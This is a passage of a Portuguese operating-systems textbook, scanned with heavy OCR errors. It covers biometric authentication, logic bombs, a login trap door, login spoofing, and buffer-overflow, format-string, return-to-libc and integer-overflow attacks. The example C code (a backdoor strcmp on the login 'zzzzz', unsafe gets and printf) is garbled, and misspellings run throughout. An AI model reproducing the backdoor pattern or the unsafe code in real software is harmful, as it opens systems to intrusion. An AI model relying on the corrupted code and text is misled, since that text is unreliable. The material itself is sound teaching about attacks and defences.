Agora vamos ver brevemcntć algumas das medidas 
biomeincas atualrneme em uso. A analise do comprimeruo 
dos dedos e surprccndeiitcmentc pratica, Quando usada, 
cada terminal dispóe do disposilivo ilustrado na Figura 9* 19* 
O usuario insere sua ma o nele e o comprimento de seus de¬ 
dos e medido e confrontado com os de um banco de dados. 
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Conuido, as medidas dos tamanhos nao sao perfcitas. 
O sistema pode ser atacado com mokles de ma os feitos de 
gesso ou algum outro materiał possivelmeme com dedos 
ajusiaveis para permiiir alguma experirnemaęao ł 

O utrą biomeiria quc esta ganhando popularidade e o 
recorihedmento pela fris. Ca da pessoa tem urn pa dra o 
diferente, ate mesmo gemeos identicos, o qvic faz com que 
esse tipo de recorihedmento seja mais facilmente auto ma- 
lizado (Daugman, 2004) e tao cficierne quanto o reconhe- 
dmento de impressoes dtgiiais. O indrnduo olha para urna 
camera, a uma distancia maxiina de 1 metro, e a maąuina 
fotografa seus olhos e exirai certas caracteristicas por meio 
da transformato de urna ondaleta de Gabor e compri- 
me o resultado ale 256 byies. A cadeia e entao comparada 
ao valor oblido no moment o do cadastramento e, se a dis- 
tancia de Hamming estiver abaixo de urn limiar critico, a 
pessoa e autcmicada. (A distancia de Hamming enire duas 
cadeias de biis e o nu mero mmimo de mudanęas necessa- 
rias a transformaęao de uma na outra.) 

Qualquer teenica que dependa de imagetis esta sujd- 
ta a I o gros. Por exempio, uma pessoa poderia se aproxi- 
mar da camera de urn cmxa automatico com ocli los escu- 
ros sobre os quais fotografias da retina de alguma outra 
pessoa tivcsscm sido colocadas. Alcm disso, sc a camera 
do eaixa automatico pode tirar uma fotografia retina! a 
um metro, outras pessoas tambem o podem, e a distancias 
ale maiores, usando ientes de tdefoto* Por isso, podern ser 
necessarias contraprovas, como fazer com que a camera 
dispare urn flash nao com o propósito de ilu mi nar, mas 
para venficar se a pupila reage coniraindo ou para ver sc 
o temido efeito dc olhos vermelhos do fotografa amador 
aparece na fotografia com Qash e nao esta preseme na 
foto sem aąuele. O aeroporto de Amsterda vem utiiizando 


a tecnologia de reconhedmemo pela iris desde 2001 para 
permitir quc os viajantes freąuentes nao precisem parar 
na i mi gra ęa o, 

Uma tecnica urn pouco difereme e a analise de assi- 
natura. O usuario assina sen nonie com uma eaneta espe- 
ciał concctada ao terminal c o computador a compara com 
um exemplar conhecido armazenado on-line ou contido 
em um cartao inieligente, E um metodo bem md hor, pois 
nao se trata de comparar a assinatura, mas de comparar 
os movimentos da eaneta e a pressao feita enquanto se 
escrevc. Um bom falsario pode ser capaz de copiar a assi- 
natura, mas nao lera como repelir exatamente e na mes- 
ma seąuencia a veloddade ou a pressao com quc os traęos 
fora m feitos, 

Um esqucma que requcr um hardware especial mmi- 
mo e a biomeiria da voz (Markowilz, 2000). E ueccssario 
apenas um microfone (ou ate mesmo um telefonc); o res¬ 
tante e software. Diferentemcnte dos sistemas de reconhe- 
cimeruo cle voz, que tentam determinar o que esta sendo 
diio, esses sistemas tentam determinar quem esta falando. 
Alguns sistemas reąuerem apenas que o usuario diga uma 
sen ha secie ta, mas esses sistemas pod cm ser ludibriados 
por urn impostor que grave as senhas em uma fita e de pois 
as reproduza. Sistemas maisavanęados dizem algo ao usua¬ 
rio e pedem para que ele repita diferentes textos a cada en- 
trada. Algumas empresas estao comeęando a usar a identi- 
ficaęao de voz para aplicaęóes, como o sistema dc compras 
pclo telefone, pois a identificaęao de voz esta menos sujdta 
a fraudes que o uso de um código idemificador. 

Poderiamos prosseguir com mais exemplos, mas ape¬ 
nas mais dois aj udarłam a determinar um ponto impor- 
tante, Ga los e outros ani mais marcam seus lerriiórios uri- 
nando no permietro de uma regiao. Aparentemente os 
gatos podem se identificar desse modo. Suponha que surja 
alguem com um pcąueno dispositivo capaz dc fazer uma 
analise instantanea da urina, lomecendo uma pmva cabal 
da ickniificaęao. Cada terminal poderia ser cąuipado com 
um desses dispositivos, com uma discreta płaca dizendo; 
"Para acesso ao sistema, por favor, deposite uma amostra 
aqui". Esse pode ser um sistema absolutameme inviolavel, 
mas talvez tenha um serio problema deaceitaęao. 

O mesmo poderia ser dito de um sistema com urna 
agulha de se linga e um pequeno espectrógrafo. O usua¬ 
rio poderia ser inslado a pressionar seu polegar contra a 
agulha, extramdo-se, assim, uma gota de sen sangue para 
ser analisado no espectrógrafo, O problema e que qualquer 
esquema de autcnticaęao deve ser psicologicamente aceita- 
vel a comunidade de usuarios. A medida dos tamanhos dos 
dedos provavelmeme nao causara problemas, mas mesmo 
algumas coisas nao invasivas, como armazenar impressoes 
digitais on-linę, podem ser inaccitavds para muitas pesśoas, 
pois das associam as impressoes digitais a crimiiiosos. 
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fltagues de dentro do sistema 


Acabamos de ver com mais detalhes como fun ci on a a 
autenticaęao do usuario, Infeiizmente, impedir que usua- 
rios nao autorizados se conectem ao sistema e apenas urn 
dos tnuitos problemas de seguranęa. Urna categoiia com- 
pletamente difcrcntc ć a d cno mi na da 'trabalhos intcrnos', 
cxecuiados por prograrnadores ou outros empregados da 
empresa usando o computador que deve ser prot egido ou 
fazendo software erińco. Esses ataąues diferem dos ataques 
mernos porquc os internos possucm tonhcrimento cspe- 
dalizado e acessos que os de fora da empresa nao possucm. 
A segtiir, daremos aiguns excmplos reais que aconteceram 
no passado, Cada um tern sua particularidade cm relaęao a 
quem exccuta o ataąuc, ąiiein csta scndo atacado c omie o 
aiacante esta ąnerendo chegar. 


9,S,11 Bom bas lógicas 

Em icnipos de tcrcemzaęocs macięas, os programado- 
res sempre se preocupam com sen trabalho. Algumas ve- 
zes eles eh ega m a Implemen iar medidas de forma a tornar 
menos dolorosa sua potencial (e invoIuntaria) safda* Para 
os quc apredam a chanlagcm, urna estrategia e escrever 
urna bomba lógica. Trata-se de urna parte de código es- 
crita por algum programador de urna empresa {que seja 
funcionario) e sccrcta menie inscrida no sistema opera- 
donal de produęao. Enąuanto o programador alimenta- 
do diariameme com unia senha, essa parte de código nao 
fara nada. Contudo, se o programador for repentinamen- 
te d cmi lido c liska mente rcmovido das depcndencias sem 
qualquer aviso, no dla seguinte fou na próxima sona na), 
a bomba lógica nao sera mais alimeniada com sua senha 
diaria e, poi tanio, explodira. Tambem sao possfveis mui- 
(as variaę5es sobrc esse tema* Em um caso famoso, a bom¬ 
ba lógica verificava o sistema de folha de pagamentos. Se 
o identificador pessoal do programador nao aparecesse 
cm dois period os consecutivos de pagamento, a bomba 
cxpIodia (Spafford et aL I9S9). 


Explodir pode envolver apagar todo o disco, apagar ar- 
quivos aleatona menie, fazer alteraęoes dificeis de detectar 
em programas importantes ou criptografar arquivos essen- 
ciais. No ultimo caso, a empresa deve fazer uma cseolha 
entre chamar a policia {o que pode atc resultar cm uma 
condenaęao por varios tneses de dctcnęao, mas certamcntc 
nao rcstauiara os arquivos) ou aceitar a chantagcm c re- 
contrataro ex-programador como um 'consultor', por uma 
soma astronómka, para que conserte o probiema fe espe- 
rar que eie nao implante omras bombas lógicas duranie 
essa 'consukoria'). 

Exislem casos registrados nos quais um virus plan- 
tou uma bomba lógica nos computadores os quais in- 
fcctou. Em gerai, todas clas estavam programadas para 
disparar juntas em determinados dia c horario futuros* 
En ii etan to, como o programador nao faz ideia dc quais 
computadores sera o afetados, as bomba s lógicas nao 
po dem ser utilizadas na proteęao do em pręgo ou em chan- 
tagens. Esse lipo de bomba, tambem cha mada bomba- 
-relógio, costuma ser próg rama da para explodir em 
uma data com a 1 gunia importancia politica. 

9.5-21 Alcapoes 

Outra falha de seguranęa causada por algucm de den¬ 
tro do sistema e o alęapao (trap door). Esse probiema e 
criado por um código i n ser ido no sistema por mn progra¬ 
mador, para desvlar alguma verificaęao corriąucira. Por 
excmplo, urn programador pode adicionar um código a um 
programa de acesso ao sistema para permitir que algucm se 
conccic usando o login 1 72172' t nao importando o que este- 
ja no arquivo de senhas. O código normal no programa dc 
acesso seria um pouco pa red do com o da Figura 9.20 (a). O 
alęapao seria a aitcraęao da Figura 9.20(b). O quc a cha ma¬ 
da para strmp faz e verificar se o nome dc entrada e '7zzzz\ 
Se for, o acesso sera bem-sucedido, nao importando qual 
senha foi digitada on mesmose foi digilada alguma senha. 
Se esse código alęapao lor mserido por um programador 
quc trabaiha para uma fabrica de computadores c vcndido 


whiEe (TRUE) { 

printff 1 login: "]; 
get_string(nanne); 
disable_echoing( ); 
printff "poss word: "): 

get_str ingfpass word); 
enable_echoing( ); 
v = check_va!idity(nanie. 
if (v) b reak; 

} 

execute_sh e I l(name); 

(a) 


whiEe (TRUE) { 
printf("login: 
get_stringtname) ; 
disable_eGhojng( ); 
printff "password: “); 
get_stringfpassword) ; 
enabie_echoing( ); 

password) ; v = check^alidityfname, password) ; 

if (v [] strcmpfname, *zzzzz") == 0) break; 

i 

execute_$hell(name) ; 

(b) 


1 Figura 9,20 (a) Código normai. fb) Código com um alęapao inserido. 
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com os computadores, o programador podera acessar qual- 
quer computador feito por essa fabrica, nao importando 
quem soja o proprietario da maquma on o que estiver no 
arquivo de sealias. O aięapao simplesmeme desvia todo o 
proccsso dc autcnticaęao. 

U ma maneira de as empresas impedirem os alęapoes e 
manier as revisoes de código como uma pratica padroni¬ 
żą da. Com essa Lecnica, uma vez que o programador termi- 
ne de escrever e de testar mu módulo, esie e comparado a 
um banco de dados com códigos. Periodica menie, todos os 
programador es de uma equipc se juntam e cada um dcles 
fica cm frcnrc ao grupo para explicar o que sen código faz, 
lin ha por linha, Isso nao só aumcma muito a próba bilidadc 
dc algućm cucontrar um aięapao, mas tambem dcva os 
riscos para o programador- pois ser apanliado cni flagi antę 
nao e nada bom para sua carreira, Sc os programadores 
protestarem muito quando isso for pro post o, manier dois 
parceiros — um verifkando o código do outro — tambem 
e uma possibilidade. 

9.5.51 Logro na autenticacao do usuario 

Nos ataąues de dentro do sisiema, o criminoso e um 
usuario legitimo que esia icmando coletar as senhas dos 
ouiros iisuarios por meio de uma lecnica denominada lo¬ 
gro na anten ticaęao do usuario. Essa te cni ca e comu- 
mente empregada em empresas com varios computadores 
piiblicos em uma rede local utilizada por miilliplos usua- 
rios. Muilas imłversidade$, por excmplo, dispoem de salas 
lotadas dc computadores, a partir de onde os alimos pudem 
se conectar a outros computadores. Fimciona da seguinte 
maneira; normalnienie, q u and o ninguem esta conectado 
a um terminal UNIK, aparcce urna lela como a da Figura 
9.2 l(a). Quando um usuario digita um nomc dc usuario, 
o sisiema pede a sen ha. Sc a sen ha for correta, sera permi- 
lido o acesso ao usuario c tera infcio um sbel) (e possIveL 
menie uma inierface grafica). 

Considere agora o seguinte cenario. Um usuario mal- 
doso, Mai- escreve um programa quc mosiraa tela da Figura 
9.21(b) + Essa Ida se parece muito com a da Figura 9.21 (a), 
só que esia nao e a tela do programa executando o progra- 
ma de acesso ao sisiema, mas uma tela falsa escrita por Mai. 
Mai agora seafasta para um local a uma di sta uda segura, da 
qual pode assisiir ao resukado da brincadeira. Quando um 


Usuario: 


(a) 


* 

* 


(W 


Usuario: 


usuario digiia sen nome de usuario, o programa responde 
pedindo uma senha e desabilkando a exibięao do que esta 
sendo digitado. Depois que o nonie de entrada e a senha 
forem capmrados, des serao escrilos cm um arquivo, em 
algum lugar distante, c o falso programa dc conexao envia- 
ra um sina! para matat o proccsso do shclt. Essa aęao lami¬ 
na o programa dc Mai, dispara o programa rcai dc concxao 
c mostra a tela da Figura 9.21 (a). O usuario presume quc 
lenka cometido algum erro de digitaęao e entao se conecta 
novamente. Dessa vez, entao, fimciona. Mas, nesse meio 
tempo, Mai adquiriu mais um par (usuario, senha). Ele 
pode coletar varias senhas emrando em varios lerminais e 
iniciando telas de acesso impostoras em todos eles. 

O linico modo rcal de impedir isso e iniriar o acesso ao 
sisiema com uma combinaęao de leelas que os programas 
do usuario nao podem capturar, O Windows usa, para isso, 
a combinaęao CTRL-ALT-DEL. Se um usuario se serve de 
um terminal e comeęa digitando CTRL-ALT- DHL, o usua¬ 
rio que estava conectado e desconectado e o programa de 
acesso ao sisiema se micia. Nao ha como ludibriar esse nie¬ 
cą nismo. 



Explorando erros de código 


Tendo visio algumas formas de aiaquc interno a se- 
guranęa, e hora de comeęarmos a csuidar como os estra- 
nhos conseguem aiacar e subverter o sisiema operacional 
a partir de ataques externos r em geral pela Internet, Quase 
todos os meeanismos de ataque se aproveitani de erros no 
sisiema operacional ou em algum programa de aplicaęao 
popular, como o Internet Explorcr ou o Microsoft Office. 
No cenario ifpico, alguem descobre um erro no sisiema 
operacional e, entao, encontra uma maneira de explora-lo 
comprometendo os computadores que executam o código 
ddeituoso. 


Embora todas as temativas envolvam a exploraęao de 
um erro em um programa especffico, existem varias catego- 
rias gerais dc erros que ocorrem com frequenda e, portan- 
to, valc a pena estudar de que forma osataąues acontecem, 
Ć o que faremos nas seędes a seguir. Observe que, como 
esic e um livro sobie ststemas opera ci ona is, o foco esia cm 
comosubvcner o sisiema operacional As diferentes formas 
de explorar erros de código em software de modo a atacar 
sit es c bancos dc dados nao serao tratadas aqui. 

Os erros podem ser explorados de diferentes formas. 
Uma maneira bem di ret a e executar um script quc funcio- 
ne da seguinte maneira: 


1. Exccutc uma varredura dc porta automatizada para 
cncontrar maguinas quc accitem concxoes via telnet 

2. Tente se conectar adivinbando as combinaęoes de 
nome de usuario e senha. 


I Figura 9,21 (a) Tela correta de autenticaęao. (b) Tela de 3. Uma vcz conectado, cxecute o programa com falhas 

auteniicaęao adulterada. com dados que causem o erro. 
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4. Se o programa com falhas tiver SETU1D root, cne 
lim shell SETU1D de rooL 

5. Escreva e execute um programa zumbi que monito- 
re os comandos en via dos a urna porta IR 

6. Faęa com que o programa zumbi seja carregado 
sempre que o sistema operadonal for inicializado. 

O scripl pode executar por um longo tempo, mas ha urna 
boa chance dc que cle aleanee os objciivos. CerLifkawlo- 
-sc de que o programa zumbi seja carregado sempre quc o 
computador seja retniciado, o ataeame garatue que, urna 
vez zumbi, para sempre zumbi. 

Outro cen ario comum e exccutar um vfrus quc i n fecie 
todas as maąuinas pela Internet e faęa com quc das cxpió¬ 
rem o erro após se coneciarem a urna nova maquina. Ba- 
sicamentc, substimem-se as etapas I e 2 do scripi anterioi, 
mas mamem-se as on tras, Indcpendememenie da aborda- 
gem, o programa do ataeame sera exeemado na maquina- 
-alvo, quase sempre sem que o don o saiba de sua existenda 
e sem que o programa perceba sua presenęa. 

_ 9.6.11 Ataque por transbordamento do 

buffer 

Um dos maiores motivos de aiaque e o fato de que 
quase todas os sistemas operacionais e a maioria dos pro- 
gramas dos sistemas sao escritos na linguagem de progra- 
maęao cm C (porque os programadores gostam dcla e por ter 
uma compilaęao extremamcnte cficicntc). Infelizmente, 
nenhum compilador C faz verificaęao de limites dos vcto- 
rcs. Coiiseqiieiitemcntc, a seguime scquenda dc cótiigo, 
embora na o seja valtda, nao e verificada: 

int i; 

char c[1024]; 

i = 12000; 

C0 = 0; 


O resultado e que algum by te de memória que esta 
10.976 bytes fora do vetor c sera sobrescrito, provavelmente 
com conseąuenrias desastrosas. Nenhuma verifkaęao e rea- 
lizada cm tempo de execuęao, dc modo a prevenir esse erro. 

Essa propriedade da linguagem C leva a ataąues do 
seguime lipo. Na Figura 9.22(a), vemos o programa Prin¬ 
cipal execmando, com suas variaveis locais na pilha. Em 
algum ponto o procedimento A e cha mado, como mostra 
a Figura 9,22(b). A seąuencia-padrao de cha mada comeęa 
inserindo o endereęo de retorno (que aponta para a pro- 
xima instmęao a ser chamada) na pilha. Entao, o controle 
ć transferido para A, que dccrcmcma o ponteiro da pilha 
para alocar memória para suas variavcis locais. 

Suponha que o trabalho de A requeira a aquisięao do 
caminho completo de um arqttivo (provavelmente conca- 
tenando o caminho do diretório atual com um nome do 
arquivo) e, entao, abra esse arquivo ou faęa algo com ele. A 
tern um buffer B de tamanho fixo (ou seja, um vetor) quc 
devc comcr um nonie dc arquivo, conforme mostra a Figu¬ 
ra 9 r 22(b). Usar um buffer dc tamanho fixo para comcr o 
nonie de um arquivo e muito mais facil dc programar que 
determinar primeiro o tamanho real c depois alocar dina- 
micamente a memória necessaria. Se o buffer tiver 1.024 
bytes, ele permiiira indos os nomes de arquivos, correto? 
Especialmeme se o sistema operadonal limita os nomes de 
arquivQS (ou, melhor ainda, os caminhos completos) para 
um maximo de 255 caracteres (ou outro tamanho fixo 
qualquer). 

Infelizmente, esse ratiocmio eon tern oma fal ha fatal 
Suponha que o usuario do programa forneęa um nonie de 
arquivo com dois mil caracteres. Quando o nonie do ar- 
quivo for usado, falhara ao abtir, mas o invasor nao se im¬ 
port a com isso. Quando o procedimento copia o nome do 
arquivo no buffer, o nome ultrapassa os limites do buffer e 
sobrescreve a memória, conforme mostra do peia area em 
cinza da Figura 9,22(c). Piór ainda, se o nome do arquivo 
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Figura B.22 (a) Situaęao na qual o programa Principal estś sendo executado. (b) Depois da chamada de procedimento A. 
(c) Transbordamento do buffer most rado em cinza. 
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for muito grandę, ele tanibem sobrescreve o endereęo de 
retorno e, assim, quando ,4 retoma, o endereęo de retorno 
e tirado do meio do nome do arqutvo. Se esse endereęo for 
algum lixo aleatório, o programa saltara para um endereęo 
aleatório c provavdmente travara ao executar mais algu- 
mas instmęoes. 

Mas, e se o nome do arquivo nao contiver lixo aleató¬ 
rio? E sc dc contiver um programa exccutavel valido c o 
esąuema Liver sido feito com extremo cuidado para que a 
palavra que estivesse sobrepondo o endereęo de retorno 
iosse justamente o endereęo de imrio de um programa (por 
exemplo, o endereęo de B)1 0 quc acontecera e que, quan- 
do A reiomar, o programa ero B comeęara a execmar, Na 
ycrdade, tera sido o invasor que sobrescreveu a memória 
com scu próprio código e conscguhi exeaitar. 

Esse mesmo truque fundona com outras coisas a leni 
dc no mes dc arquivos. Fundona com cxicnsas cadeias dc 
Caractcres como variaveis dc ambiente, entrada do usuario 
ou qualquer situaęao na qtial o programador tenha triado 
um buffer de tamanho fixo para tratar u ma cadeia forne- 
cida pelo usuario, a qual se esperava que fosse auta. For- 
necer u ma longa cadeia a stu ci osa mc mc preparada c quc 
contenha um programa e urna maneira de coloca-lo na 
pil ha e, entao, executa-lo. A funęao de bibiioteca gets, em 
C quc le uma smug (dc tamanho dcsconhcrido) cm um 
buffer dc tamanho fixo, mas sem verifkar o transbordo, ć 
um exemplo notório por estar sujeita a esse tipo de aiaąue. 
Alguns compiladorcs che gam atć a dctcetar o uso da gets c 
alertam o programador sobie isso. 

Agora vem a parte desagradavel Suponha que o pro- 
grama atacado tenha SETUID dc root no UNIX (ou que te¬ 
nha o poder do Adminisirador no Windows 2000, o que ć 
efetivaniente a rnesma coisa). O código inserido pode agora 
fazer varias chamadas dc sistema para convcrter o arquivo 
do shell do invasor cm SETUfD root, para quc, quando for 
executado, tenha poderes dc superusuario, Ou, entao, ago¬ 
ra de pode mapear uma bibiioteca eompartilhada, cspecial- 
mente preparada, capaz dc causarlodo tipo dc prejuizo* Ou 
pode simplesmente emilir urna chamada de sistema exec 
para sobrepor o programa em execuęao com o shell, crian- 
do um shell com poderes dc superusuario. 

Piór ainda, ele pode fazer a transferencia de um pro- 
grama ou script pela Internet e armazena-lo no disco. Em 
seguida, pode criar um proccsso quc execute o programa 
ou script e fazer com ąuc dc moniiorc uma porta 1P esped- 
fica, aguardando por comandos a serem executados, o que 
faz da maquma um zumbi. Para cvitar quc o novo zumbi 
sc perca ąuando a maąuina for rcinidalizada, o código dc 
aiaąue precisa apenas garantir quc o novo programa ou 
shell seja iniciado sempre que a maąuma for iniciada. Isso e 
fadl dc fazer tamo no Windows quamo cm todos os UNIX. 

Uma grandę parte dc todos os próbie mas de seguranęa 
ocorre por conia dessa falha, que e diftcil de consertar por 
causa do grandę ml mero de programas em C que nao veri- 
ficam se ha transbordamento do buffer. 


Detectarse um programa tern problemas de transbor- 
damento do buffer e faril: e só alimenta do com nornes de 
arquivos com dez mil caractcres, salarios dc ccm digitos ou 
alguma coisa inesperada, para ver se cle sai normalnienie 
da execuęao $alvando a imagem da memória no disco. O 
próximo passo e analisar a imagem da memória, proc ti¬ 
ra udo por uma cadeia longa. A partir dat, encontrar qual 
caractere sobrescreve o endereęo de retorno nao e tao diff- 
dl. Se o código-fonte estiver dispomvel, como e o caso da 
maioria dos programas UN1X, o ataquc e bastantc farilita- 
do, pois o layout da pil ha c conhccido antcdpadamcntc. O 
ataąue pode ser prevcnido consertando-se o código, para 
que verifique exphritameme o tamanho dc todas as cadeias 
forneddas pelo usuario, em vez de euche-lo de buffers de 
tamanho Jixo. Infelizmente, a preocupaęao com a vulne- 
rabilidade de algum programa a esse tipo de ataque geral- 
mentc surge depois de um ataque bem-sucedido. 

9-6.21 Ataque$ a cadeia de formato 

Embora sejam eximios digitadores, alguns programa- 
dores nao gostam de digitan Por quc cha mar uma variavd 
de refermce_mmt ąuando rc obviamenie significa o mesmo 
e representa uma economia de 13 toques em cada ocorren- 
cia? Essa falta de gosto por digitaęao, emretanto, algu mas 
vczcs pode levara falhas catastróficas de sistema, conforme 
vcrcmos a seguin 

Considcre o segutnle fragmento dc um programa cm 
C que exibe o tradirional cumprimento em C no infcio do 
programa: 

char '8^'Hello World"; 

printfC%S 5 \ s); 

Nesse programa, a vartavel ^ ć dedarada c inidalizada 
com a string "Hello World" e um byte-zero que indica o 
finał da string. A chamada a funęao prmt/possui dois argu- 
meruos: a cadeia dc forma "%s" — que indica a irnprcssao 
dc uma string — co endereęo da cadeia. Quando executa- 
do, esse pcdaęo dc código cxibc a mensagem na tela (ou no 
dispositivo onde sao mostradas as saidas). Ele esta correto 
e c a prova de ba las. 

Mas i magmę quc o programa<ior sirua preguięa c, em 
vcz dc digitar o código anterior, digitc o seguintc: 

char # s= Hollo World 11 ; 

printffs); 

Essa chamada a funęao printf e permitida porque essa 
funęao possui um numero variavd de argumenios, dentre 
os quais o primeiro deve ser a cadeia dc formato. Entrc- 
tanto, uma string quc nao contenha nenhuma informaęao 
de fprmataęao (como *%$") tarnbem e permitida. Portan- 
to, embora o segundo exempIo nao seja uma boa pratica 
cm programaęao, ć perm itido c vai fundona r Mci hor dc 
ludo e que economiza a digitaęao de cinco caracteres — um 
grandę ganhn, e cl aro. 
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Seis meses depois, um outro programador e instnndo a 
modificar o código de forma a perguntar o nome do usua- 
rio e, ein seguida, cumprimenta-lo utilizando sen nome. 
Depois de estudar o código com pressa, elc faz as modifka- 
ęocs e o programa fica da scguintc maneira: 

char s[100], g[100] - £, He1lo :, ; /* declara s e g; inicializa g 7 

gets(s); /* 1e uma string do teclado e 

anmazenaems*/ 

strcatfe, s); r concatena $ ao fi nal de g 7 

printfjg); I* exibe g 7 

O programa agora le nma siring via ledado, armazena 
na variavel i que, por sua vez, e concatenada a variavel g f 
ja inirializada, para armazenar tambem em g a mensagem 
a ser exibida. Ale aqui, tu do bem (exceto pelo uso de gets, 
que esta sujeito a ataąues por transbordamento do buffer, 
mas e facil de uiilizar e ainda e bastante popular). 

Gontu do, um usnario cxperiente que ten ba visto esse 
código rapidamenie perceberia que a entrada aceita via te- 
cl a do nao e somente uma siring, mas uma cadeia de forma- 
10 e, como lal, todas as esperificaęoes de formaiaęao permi- 
lidas peia funęao printf irao funcionar. Embora quase todos 
os indicadores de formaiaęao, como"%s" (para exibięao de 
strings) e "'“/od" (para exibięao de inteiros decimais), forma¬ 
tem safdas, algutis ddes sao especiais. O indicador "%n H , 
cm particular, nao cxibe nada, mas calcu la ąuantos caracie- 
res ja foram impressos ate a posięao na qual elc ąparcce na 
string e armazena cssa ąuantidade no próximo argumer¬ 
lo de prmtf para que seja processado. A seguir lemos um 
exemplo de um programa que utiliza *%rT: 

int mai n (int arge, char *argv[]) 

f 

int i=0; 

printf^ Hetlo %nworld\n&i); t o %n e armaze- 

nado em i 7 

printf(*l=%d\n’\ i); t i agora contem 6 V 

} 

Quando compilado e execiitado, a saida e a scguintc: 

Hello world 

1=6 

Observe que a variavel i foi modificada por uma cha- 
mada a printf, algo que nao e óbvk> para todos. Embora 
este seja um reeurso eveniual menie ulil, elc sigm fica que 
a exibięao dc uma cadeia cle forma to pode fazer com que 
uma palavra — on muitas palavras — seja armazenada na 
memória. Poi uma boa ideia incluir esse reeurso na fun¬ 
ęao primp Definitivamentc nao, embora cle te oba pareeido 
miii to utll quando de sua criaęao. Muitas vulncrabilidadcs 
dc software eonie ęa ram assim. 

Como vimos no exemplo anterior, o programador que 
modificou o código addentalmenie passou a permitir que o 


usuario do programa digiie (inadvertidamente) inna cadeia 
de formato. Como a exibięao de uma cadeia de fermato 
pode sobrescrever a memória, temos agora as ferramen- 
tas necessarias para sobrescrevcr o endereęo de retorno 
da funęao printf na pilha c pular para outro lugar — por 
exctnplo r para o interior da rcccm-digitada cadeia dc for¬ 
mato, Essa abordagem ć chamada de ataqiie h cadeia de 
formato. 

Uma vez que o usuario possua a habilidade de so- 
brescrever a memória e foręar um salto para um código 
recem-chegado, esse código passa a ter todo poder e direito 
dc accsso que o programa atacado tern. Sc o programa for 
SETU1D root, o atacante pode criar um slicll com prmlć- 
gios dc root. Os detalhes quc viabilizani csse ataquc sao um 
potico complicados c especfficos para reproduzirmos aqtii, 
mas basta dizer que esse ataque e um problema serio. Sc 
voce di gitar "format string attack" no Google, vai obter um 
enorrne numero de informaęóes sobre esse problema. 

Como obscrvaęao, o uso de vetores de caracteres dc 
ta ma 11 I 10 fixo nesse cxcmplo tambem seria capaz de causar 
um ataąuc por transbordamento do bu Her 

9-6.S I Ataque de retorno a libc 

Tanio o ataqnc por transbordamento do buffer quanto 
o ataque a cadeia dc formato requer a colocaęao na pilha 
tle dados fornecidos pelo tiwasor e o retorno da funęao 
atual para esses dados e nao para sen chamador. Uma for¬ 
ma de com ba ter esses ataques e marcar as paginas de pilha 
como leitura/escrita, mas nao execuęao. As CPUs Pentium 
modę mas podem fazer isso, embora a maioria dos sistemas 
operacionais nao se beneficie dessa possibilidade, Exisic, 
contudo, outro ataque quc funciona mesmo quc os pro- 
gramas na pilha nao possani ser exccutados: o ataque de 
retorno a libc. 

Imagine que um transbordamento do buffer ou ataque 
a cadeia de formato tenha sobrescrito o endereęo de retor¬ 
no da Funęao atual, mas nao conslga executar na pilha o 
código fornecido pelo atacante. Exlste algum outro lugar 
para onde seja possfvd retornar dc forma a comprometer 
a maquina? Pois e, existe. A maioria dos prógrarnas em C 
esta ligada a biblioteca libc, que normaInieme e comparti- 
Ihada e contem ftmęóes essendais de que a maior parte dos 
prógra mas em C necessita. Uma ddas ć a funęao stupy, que 
copia uma cadeia arbiuaria de bytes de qualquer endere- 
ęo para qualquer outro endereęo. A natureza desse aiaque 
consiste em enganar a funęao strepy e fazer com que da 
copie o programa do atacante, normalnienie chamado de 
shellcode, para o seginento de dados e fazer com que de 
seja executado la. 

Passemos a os fatos basicos reladonados a esse ataque. 
Na Figura 9.23(a), vemos a pilha exatameme depois de o 
programa principal chamar a funęao/. Vamos supor que 
esse programa esta sendo executado com privilegios de su- 
perusuario (ou seja, e SETUID de root) e apresenta um erro 
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passfvel cle ser explorado que permite que o a taca me leve 
seu shellcode para a memória, conforme ilusira a Figura 
9.23(b), Aqui mostramos o shellcode no topo da pilha, 
onde dc nao pode ser exccutado. 

Alem de colocar o shellcode na pilha, o ataque umbem 
precisa sobrescrever as quatro palavras sombreadas mos- 
tradas na Figura 9.23 (b). A palavra niais baixa armazenava 
o endereęo de retorno ao programa principal, mas agora 
armazena o endereęo de strepy, de forma que r quando/re- 
torna, volta a strąiy. Nesse ponto, o ponteiro da pilha ira 
apontar para um endereęo de retorno fictido que a própria 
fuiięao strepy ira utilizar ąuando terminar, E nesse endereęo 
que o shellcode estara localizado. As duas palavras adma 
desla sao os endcreęos fonie c destino para a cópia. Quan- 
do strepy lermmar, o shellcode estara nesse novo endereęo 
n o segmentu de dados (executavd) e strepy ira 'retor nar' 
a de. O shellcode, sendo executado com os privilegios da 
programa de ataque, pode criar mu shell para que o ata- 
cante ulilize mais tarde ou pode iniciar um script que mo- 
niiore alguma porta IP a espera de comandos. Aessa altura, 
a maquina ja se tornou um znnibi e pode ser utilizada para 
enviar spam ou iniciar um ataque de recusa dc servięos a 
seu mestre. 

9-6.41 Ataque por transbordamento de 
numeros inteiros 

Os computadores executam arumettca iutcira cm mi¬ 
ni eros dc tamanho fixo, gcralmente com comprimento de 
8,16, 32 ou 64 bits. Se a soma dc dois nómcrosa serem so- 
mados ou multiplicados e maiordo quc o inteiro maximo 
quc pode ser repiesentado, temos um transbordamento. 
Programas cm C nao detcctam esse erro c simplcsmenie 
o ignoram e utilizam o valor er rad o. Em particular, se as 

Espaęo de endereęamento Espaęo de endereęamento 


yirtual __ yirtual 



Variaveis Eocais 
do principal 


Variaveis parcia! mente 
descartadas 

sre 

dst v 

Endereęo de 
retorno para strepy 

Endereęo de 
retorno ao principal 

Endereęo da 
funęao strepy j 

Vartaveis locais de F 

Variaveis locais de F l 



SP 

Shellcode 


Programa 

Programa 


(a) (b) 


variaveis foram sinalizadas como do tipo inteiro, o resuhado 
da adięao ou mulliphcaęao de dois inteiros positivos pode 
ser armazena do como um inteiro negativo. Se as variaveis 
nao tiverem sina], os resultados serao positivos, mas podem 
ter transbordado. Considerc, por excmplo, dois inteiros dc 
16 bits nao sinalizados, cada um contcndo o valor 40.000, 
Sc forem multiplicados juntos c o resulLido armazenado 
cm otilro inteiro de 16 bits, o produlo aparentc e 4096, 

Essa habilidade para causar o transbordamento nu¬ 
mer ico nao detectavd pode se transformat cm um ara- 
que. U ma forma de fazer isso c alimcntar o programa com 
dois parameiros validos (porem longos), sabendo que eles 
serao soniados ou multiplicados e que resultarao cm um 
transbordamento, Alguns programas gra fi cos, por exem- 
plo, possuem alguns parameiros de linha de comando que 
definem a altura e a largura de um arqitivo de imagem ou 
o tamanho no qual devc ser convertida urna imagem dcii- 
nida como entrada, Sc os valorcs de altura c largura forem 
defmidos dc forma a causar um transbordamento, o pro- 
